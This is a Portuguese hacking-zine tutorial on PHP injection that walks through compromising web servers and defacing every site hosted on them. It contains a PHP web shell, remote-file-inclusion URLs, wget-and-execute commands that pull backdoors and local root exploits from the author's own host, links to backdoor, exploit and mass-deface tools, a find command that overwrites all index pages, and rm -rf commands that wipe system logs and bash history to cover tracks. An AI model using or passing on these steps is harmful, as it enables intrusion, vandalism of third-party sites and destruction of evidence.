Tutoriais
Tutorial php injection By Nickvicq
http://www.fullcrew.org/tutos/php.txt
[inicio]
Nickvicq [/nick]#
InsideTeam [/team]#
Nickvicq@Gmail.com [/mail]#
Nickvicq@hotmail.com [/msn]#
/server Irc.rizon.net -j #full [/irc]#
inicio
Bom soh toh escrevendo aki pra enxer essa zine loka mas eu sei q ninguem
vai ler :P~~
Eu sou o Nickvicq tenho 14 anos so do InsideTeam e mexo com hacking
a 5 anos
mas com deface naum faz nem 5 meses mas posso dizer q jah aprendi mtu,
naum o suficiente,
mas mtu hehehe e estou aki para passar as tecnicas mas novas do deface
jah q as zines
existentes estaum antigas e ninguem tem mas saco de escrevelas, e estou
dizendo q ela
naum foi feita para users avançados nem para os leigos estou
escrevendo ela pra qm tem
vontade de aprender, naum vou ensinar td boa parte vcs vaum terq procurar
mas eu irei
ensinar o "caminho" axo q jah tah na hora de começar
pq jah escrevi mtu.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Conteudo:
1) Php Injection
1.1 - Strings
1.2 - Cmds
1.3 - Backdoors (Bds)
1.4 - Revisão
1.5 - Shell
1.6 - Telnet
1.7 - Exploit (xpl)
1.8 - Deface
1.9 - Apagando Logs
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
1.1 - Strings
Strings são os erros no codigo php, que permitem ao usuario
mal intencionado "adicionar"
uma pagina qualquer no server, no caso as cmds.
Exemplo: www.sitevulneravel.com/index.php?page=[CMD]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
1.2 - Cmds
Cmds são scripts que conseguem acesso para emular o /bin/sh
assim permitindo que você execute
comandos pelo navegador.
Exemplo: www.sitevulneravel.com/index.php?page=http://www.sitedacmd.com/cmd.gif?&cmd=[Comandos]
Um exemplo do codigo de uma cmd simples:
[Codigo]
<?php
system($cmd);
?>
[/Codigo]
Existem mtus outras cmds mais elaboradas que contem codigos que permitem
de edição de arquivos
á
busca de diretórios com permição de ecrita e mtu
mais.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
1.3 - Backdoors (Bds)
Backdoors são programas q abrem uma porta no sistema para uma
coneção remota sem autenticação,
para baixar os backdoors no sistema vc deve usar comandos como wget
lynx e get, existem outros
eh soh procurar mas esses são os mais comuns.
Exemplo: cd /var/tmp; wget www.seusite.com/bd/r0nin; chmod 777 r0nin; ./r0nin;
Agora eu vou explicar +o- o codigo
#cd /var/tmp Eh usado para ir para a pasta /var/tmp geralmente com
permição para td
#wget www.seusite.com/bd/r0nin esse comando serve para baixar o bd
no sistema
#chmod 777 r0nin esse eh para dar permição para qualquer
usuario executar o arquivo r0nin
#./r0nin Executa o arquivo r0nin
Nois usamos o ; para executar + de um comando em uma linha, sempre na sintaxe cmd; cmd
P.S.: O r0nin roda na porta 1666
=============== BackDoors ===============
http://nickvicq.yoll.net/BD/bd.pl
http://nickvicq.yoll.net/BD/cgi
http://nickvicq.yoll.net/BD/r0nin
http://nickvicq.yoll.net/BD/Portas.txt
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
1.4 - Revisão
Bom pra qm ainda naum entendeu direito aki eu vou dar uma explicada na sintaxe geral
Exemplo:
www.site.com /index.php?page= http://www.sitedacmd.com/cmd.gif?&cmd= ls
^ ^ ^ ^
Vitima String CmD Comando unix
P.S.: Sem os espaços.
Lembrando q os comandos q usamos para baixar e executar o backdoor tbm são comandos unix
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
1.5 - Shell
É um programa interpretador de comandos que permite ao usuário
iteragir com o sistema
operacional através de comandos digitados.
Agora darei um exemplo de comandos para serem utilizados na shell (Comandos unix)
ls -> Lista arquivos. Pode ser combinado com -a (mostra
ocultos) e -l (mostra detalhadamente). Ex: ls -la
(mostra detalhadamente os arquivos, inclusive ocultos).
uname -a -> Mostra informações do sistema, como versão
do kernel,
nome, e outras coisas uteis.
id -> Mostra sua id.
w -> Lista os usuários logados no momento.
cp -> Copia arquivos. Sintaxe: cp arquivo /destino/
mv -> Move arquivos. Sintexe: mv arquivo /destino/
rm -> Remove arquivos. Se combinado com -rf , remove todos
os arquivos setados, inclusive pastas
mkdir -> Cria diretorio
rmdir -> Exclui diretorio
find -> Procura por arquivos/pastas. Ex: " find /etc -name
httpd.conf " procura pelo httpd.conf na pasta /etc
pwd -> Mostra em que pasta você está localizado
cat -> Exibe o conteúdo de um arquivo na tela
head -> Exibe linhas do início do arquivo
tail -> || || || final do arquivo
ctrl+c -> Sai/killa um programa
ctrl+r -> Busca comando digitado no history do bash
ps -auxw -> Lista todos os processos do sistema
netstat -na -> Status da conexão
kill -9 -> Mata processo. Sintaxe: kill -9 PID DO PROCESSO
kill -HUP -> Reinicia processo. Sintaxe: kill -HUP ID DO PROCESSO
pico -> Editor de texto. Sintaxe: pico arquivo
vi -> | | vi arquivo
Salvando resultados em arquivos
comando > /arquivo/onde/será/armazenado
Ex: ls /etc > /tmp/s.txt salva todo o resultado da listagem de
/etc no arquivo /tmp/s.txt
Adicionando linhas em arquivos
echo ' linha ' >> /arquivo/onde/será/incluido
Descompactando arquivos (os mais comuns)
.tar -> tar xvf arquivo.tar
.tar.gz -> tar zxvf arquivo.tar.gz
.tar.bz2 -> tar jxvf arquivo.tar.bz2
.zip -> unzip arquivo.zip
Compactando arquivos (os mais comuns)
.tar -> tar cvf destino.tar ARQUIVO
.tar.gz -> tar cvf destino.tar ARQUIVO | gzip destino.tar
.tar.bz2 -> tar cvf destino.tar ARQUIVO | bzip2 destino.tar
.zip -> zip destino.zip ARQUIVO
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
1.6 - Telnet
Ele eh utilizado para conexões remotas no nosso caso para nos conectarmos a shell.
Para executalo vá em iniciar > executar e digite
telnet www.siterodandobd.com 1666
onde 1666 eh a porta do backdoor.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
1.7 - Exploit (xpl)
Exploits são programas que explorão falhas nos sistemas
para te dar acesso root
a varios tipos de exploits nois usaremos o exploit local, o exploit
local
eh rodado diretamente no sistema ou seja conectado a shell.
root - Super Usuario / Administrador
O usuario root tem acesso total ao sistema.
Vc deve baixar o exploit na shell na msm sintaxe do backdoor.
Exemplo: cd /var/tmp; wget www.sitedoxpl/xpl; chmod 777 xpl; ./xpl;
Se tudo correr certo vc estara de root para conferir eh soh digitar "id" vc devera ver algo como:
bash-2.05b# id
uid=0(root) gid=0(root)
================ Locais ================
http://nickvicq.yoll.net/local/bsdlocal
http://nickvicq.yoll.net/local/dc
http://nickvicq.yoll.net/local/dc.pl
http://nickvicq.yoll.net/local/dexter
http://nickvicq.yoll.net/local/epcs2
http://nickvicq.yoll.net/local/execve-setreuid
http://nickvicq.yoll.net/local/inebriation
http://nickvicq.yoll.net/local/kmod
http://nickvicq.yoll.net/local/kmod2
http://nickvicq.yoll.net/local/locale
http://nickvicq.yoll.net/local/man-rh7.sh
http://nickvicq.yoll.net/local/modutils.sh
http://nickvicq.yoll.net/local/mount
http://nickvicq.yoll.net/local/mremap2
http://nickvicq.yoll.net/local/my-xperl.sh
http://nickvicq.yoll.net/local/prlnx.sh
http://nickvicq.yoll.net/local/pt
http://nickvicq.yoll.net/local/ptrace24
http://nickvicq.yoll.net/local/smlnx.sh
http://nickvicq.yoll.net/local/su
http://nickvicq.yoll.net/local/traceroute
http://nickvicq.yoll.net/local/vim-xpl
http://nickvicq.yoll.net/local/vudo.c
http://nickvicq.yoll.net/local/xperl.sh
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
1.8 - Deface
Bom agora para podermos fzer o deface vamos listar os sites hospedados no server
Geralmente os sistes fikam listados no arquivo httpd.conf
As urls fikam +o- assim:
ServerName www.sitedoserver1.com
ServerName www.sitedoserver2.com
Bom oq temos q fzer eh listar apenas as linhas q contenhaum ServerName
na frente
Usaremos o comando:
cat httpd.conf | grep ServerName
Se os sites estiverem neste arquivo vc podera salvar o resultado e
baixalo,
para isso deveremos saber o diretorio onde esta hospedado o site, eh
soh digitar
o comando PWD na na hora q entrar na shell, ele listara o diretorio
do site, algo como:
/home/httpd/vhosts/sitebugado.com/
Entaum no caso o site seria www.sitebugado.com para salvarmos a lista nele usaremos:
cat httpd.conf | grep ServerName > /home/httpd/vhosts/sitebugado.com/LISTA.txt
e depois eh soh ir no site e baixar o arquivo www.sitebugado.com/LISTA.txt
Mas onde estah o arguivo httpd.conf?
Geralmente ele fika em /etc/httpd/conf ou /etc/apache/conf mas isso
pode variar
Nois podemos fzer uma busca no sistema usando o comando:
find / -name httpd.conf
Isso mostra onde estah o arquivo httpd.conf
Se msmo assim naum encontrar a outras formas como por exemplo:
Se o site www.sitebugado.com estah em /home/httpd/vhosts/sitebugado.com/
eh mtu
provavel q os outros estejam em /home/httpd/vhosts/ para listar as
pastas eh soh
usar o cmd ls.
Exemplo: cd /home/httpd/vhosts/sitebugado.com/; ls
O resultado deve ser algo como:
site1.com
site2.net
site3.com.br
site4.org
site5.gov
em alguns server naum aparece a estensão do server por exemplo:
em vez de site1.com fikaria soh site1
isso complica bastande pq vc tera o trabalho de descobrir a extensão
Nem sempre eh assim isso varia mtu de server em server então
vasculhem bastante.
Bom agora iremos trocar as paginas do server pela sua pagina,
primeiro faça a sua index e hospede em um server e depois baixe
na shell
Exemplo: cd /var/tmp; wget www.seusite.com/index.html
Agora iremos trocar todas as outras pela sua. Simples, basta um comando para isso:
find /pasta/onde/estão/os/sites -name "index.*" -exec cp /onde/está/sua/index.html {} \;
Exemplo: find /home/httpd/vhosts -name "index.*" -exec cp /var/tmp/index.html {} \;
A tbm programas q fzem isso, naum irei ensinar como usar pq eles saum comentados e mtu faceis de usar.
================= Mass =================
http://nickvicq.yoll.net/mass/cancer
http://nickvicq.yoll.net/mass/kaotic.pl
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
1.9 - Apagando Logs
Alguns comandos úteis para apagar logs:
rm -rf /var/log
rm -rf /var/adm
rm -rf /var/apache/log
rm -rf $HISTFILE
find / -name .bash_history -exec rm -rf {} \;
find / -name .bash_logout -exec rm -rf {} \;
find / -name log* -exec rm -rf {} \;
find / -name *.log -exec rm -rf {} \;